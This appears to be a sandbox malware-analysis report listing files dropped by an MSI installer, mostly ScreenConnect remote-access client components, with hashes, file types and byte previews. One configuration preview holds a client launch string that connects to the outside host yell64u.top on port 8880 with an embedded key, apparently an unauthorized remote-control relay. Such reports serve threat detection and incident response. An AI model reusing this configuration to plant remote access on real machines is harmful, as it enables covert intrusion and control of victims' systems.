                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):81696
                                                              Entropy (8bit):5.862223562830496
                                                              Encrypted:false
                                                              SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                              MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                              SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                              SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                              SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):266
                                                              Entropy (8bit):4.842791478883622
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):3343
                                                              Entropy (8bit):4.771733209240506
                                                              Encrypted:false
                                                              SSDEEP:96:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHlHgHyHNHtH29PtxA2oFHX:opPN
                                                              MD5:9322751577F16A9DB8C25F7D7EDD7D9F
                                                              SHA1:DC74AD5A42634655BCBA909DB1E2765F7CDDFB3D
                                                              SHA-256:F1A3457E307D721EF5B63FDB0D5E13790968276862EF043FB62CCE43204606DF
                                                              SHA-512:BB0C662285D7B95B7FAA05E9CC8675B81B33E6F77B0C50F97C9BC69D30FB71E72A7EAF0AFC71AF0C646E35B9EADD1E504A35D5D25847A29FD6D557F7ABD903AB
                                                              Malicious:false
                                                              Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines (449), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):939
                                                              Entropy (8bit):5.796466792414452
                                                              Encrypted:false
                                                              SSDEEP:24:2dL9hK6E4dl/nuuAnCiCBrxKrlI3ZXfePI9Rp3vH:chh7HHnDAnCPrxKa3lff3v
                                                              MD5:10ACBCF7D80CC0D8D0D67FF0987D0189
                                                              SHA1:00E379C7CDFAB98198FFEF891BAD17231262CF66
                                                              SHA-256:4A4C00DA35C8FB61FF854E9D9916E74CE0433DEC574673C41D70A9374C5C7636
                                                              SHA-512:6ABBA073E467B6152A6B828B8E07BBC4794656CA6F040CE0D132A717CA483A9E7756B7EDBD414AC9A4A032D31FC1570DE72855A7F35386CB1AE90BC890A1CCD9
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=yell64u.top&amp;p=8880&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):746
                                                              Entropy (8bit):5.349174276064173
                                                              Encrypted:false
                                                              SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                              MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                              SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                              SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                              SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                              Category:dropped
                                                              Size (bytes):1086792
                                                              Entropy (8bit):7.793516535218678
                                                              Encrypted:false
                                                              SSDEEP:24576:4UUGG/qSDceVjLHGeRdtRiypAxiK7cl72km/4aoczU:bG/XcW32gqkAfosU
                                                              MD5:30CA21632F98D354A940903214AE4DE1
                                                              SHA1:6C59A3A65FB8E7D4AD96A3E8D90E72B02091D3F4
                                                              SHA-256:4BB0E9B5C70E3CAEB955397A4A3B228C0EA5836729202B8D4BA1BE531B60DAFC
                                                              SHA-512:47509F092B089EB1FFC115643DCDFBFAC5F50F239DE63ECAD71963EC1D37FF72B89F5A2AEA137ED391BA9BA10947ABBE6103DB1C56032FD6B39A0855CB283509
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):234
                                                              Entropy (8bit):4.977464602412109
                                                              Encrypted:false
                                                              SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                              MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                              SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                              SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                              SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                              Malicious:false
                                                              Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):49152
                                                              Entropy (8bit):4.62694170304723
                                                              Encrypted:false
                                                              SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                              MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                              SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                              SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                              SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):36864
                                                              Entropy (8bit):4.340550904466943
                                                              Encrypted:false
                                                              SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                              MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                              SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                              SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                              SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):57344
                                                              Entropy (8bit):4.657268358041957
                                                              Encrypted:false
                                                              SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                              MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                              SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                              SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                              SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):176128
                                                              Entropy (8bit):5.775360792482692
                                                              Encrypted:false
                                                              SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                              MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                              SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                              SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                              SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):548864
                                                              Entropy (8bit):6.031251664661689
                                                              Encrypted:false
                                                              SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                              MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                              SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                              SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                              SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):11776
                                                              Entropy (8bit):5.267782165666963
                                                              Encrypted:false
                                                              SSDEEP:192:TY8/Qp6lCJuV3jnXtyVNamVNG1YZfCrMmbfHJ7kjvLQbuLd9NEFbOhmX:Z/cBJaLXt2NaheUrMmb/FkjvLQbuZZmX
                                                              MD5:5060FA094CE77A1DB1BEB4010F3C2306
                                                              SHA1:93B017A300C14CEEBA12AFBC23573A42443D861D
                                                              SHA-256:25C495FB28889E0C4D378309409E18C77F963337F790FEDFBB13E5CC54A23243
                                                              SHA-512:2384A0A8FC158481E969F66958C4B7D370BE4219046AB7D77E93E90F7F1C3815F23B47E76EFD8129234CCCB3BCAC2AA8982831D8745E0B733315C1CCF3B1973D
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m............." ..0..&..........&E... ...`....... ..............................t.....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...,%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1721856
                                                              Entropy (8bit):6.639136400085158
                                                              Encrypted:false
                                                              SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                              MD5:9F823778701969823C5A01EF3ECE57B7
                                                              SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                              SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                              SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {64D6109D-BB46-4239-08D9-EC110E53E92E}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                              Category:dropped
                                                              Size (bytes):13422592
                                                              Entropy (8bit):7.966821211716796
                                                              Encrypted:false
                                                              SSDEEP:196608:h53JLR3LGMLiW35+53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53JZ:bTiuyTXTtTPTkTzT
                                                              MD5:ED78BAD542629E617AE49DFEFFABCFCC
                                                              SHA1:BF5EFE919B3C3561C433D9D4CD0F323A9359017E
                                                              SHA-256:86231CCA7231E3905A7317D07350C19F3923E24F34732C0AA6C022599913B1A3
                                                              SHA-512:45157229E4E2F6C5730ED1D1A233928538D7C7C71F549D8552CBE077F6DC22F7CDC390631696E8024C443B69979D8B4D8983142B6B93375ECE5B4F4F4609AA3F
                                                              Malicious:false
                                                              Preview:......................>.......................................................{...j...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {64D6109D-BB46-4239-08D9-EC110E53E92E}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                              Category:dropped
                                                              Size (bytes):13422592
                                                              Entropy (8bit):7.966821211716796
                                                              Encrypted:false
                                                              SSDEEP:196608:h53JLR3LGMLiW35+53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53JZ:bTiuyTXTtTPTkTzT
                                                              MD5:ED78BAD542629E617AE49DFEFFABCFCC
                                                              SHA1:BF5EFE919B3C3561C433D9D4CD0F323A9359017E
                                                              SHA-256:86231CCA7231E3905A7317D07350C19F3923E24F34732C0AA6C022599913B1A3
                                                              SHA-512:45157229E4E2F6C5730ED1D1A233928538D7C7C71F549D8552CBE077F6DC22F7CDC390631696E8024C443B69979D8B4D8983142B6B93375ECE5B4F4F4609AA3F
                                                              Malicious:false
                                                              Preview:......................>.......................................................{...j...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):430957
                                                              Entropy (8bit):6.617260991920889
                                                              Encrypted:false
                                                              SSDEEP:6144:WuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqv+ssQ:WuH2anwohwQUv5uH2anwohwQUv+ssQ
                                                              MD5:56DDBE6E146592EE51DBF635CCC29CF8
                                                              SHA1:455EAE073351ED2A29F01ADF3D2E19B299BAB5BE
                                                              SHA-256:89062997E1DF3EBEB5AF1A95111B23879082CBFDA3D73D0BD05DAA8F015B732C
                                                              SHA-512:C4089FE649F9A637229F50020E8670789441D8AEC23E63893B615C9F6EEFE4AC2E3ED99E71D8AD31CB394F8E6752F459793C8996100D1E68AF5133B4594BAC54
                                                              Malicious:false
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI15E9.tmp, Author: Joe Security
                                                              Preview:...@IXOS.@.....@.|mY.@.....@.....@.....@.....@.....@......&.{64D6109D-BB46-4239-08D9-EC110E53E92E}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{64D6109D-BB46-4239-08D9-EC110E53E92E}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}^.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}f.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}c.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):207360
                                                              Entropy (8bit):6.573348437503042
                                                              Encrypted:false
                                                              SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                              MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                              SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                              SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                              SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):207360
                                                              Entropy (8bit):6.573348437503042
                                                              Encrypted:false
                                                              SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                              MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                              SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                              SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                              SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):1.1617053516056106
                                                              Encrypted:false
                                                              SSDEEP:12:JSbX72FjuJaAGiLIlHVRpMh/7777777777777777777777777vDHFeoGzjPlp3Xz:JVQI5c8oGzP6F
                                                              MD5:100E9446ECA4A817AF5E25E8877624B8
                                                              SHA1:3EBC386F84CE535216944758451F70F591F1D141
                                                              SHA-256:6A204983B89518995CA7767A412C398DF72D3B196F60E8120F672296CB23F6C3
                                                              SHA-512:78BCF274DB5B1AB776A721296656605A38A6F5BA9F9C00814A2DF548C840BE1DD0FEF3ABED358CD4399D83DA56A96BC49605CB6B4155946490FE869D89C3BA08
                                                              Malicious:false
                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
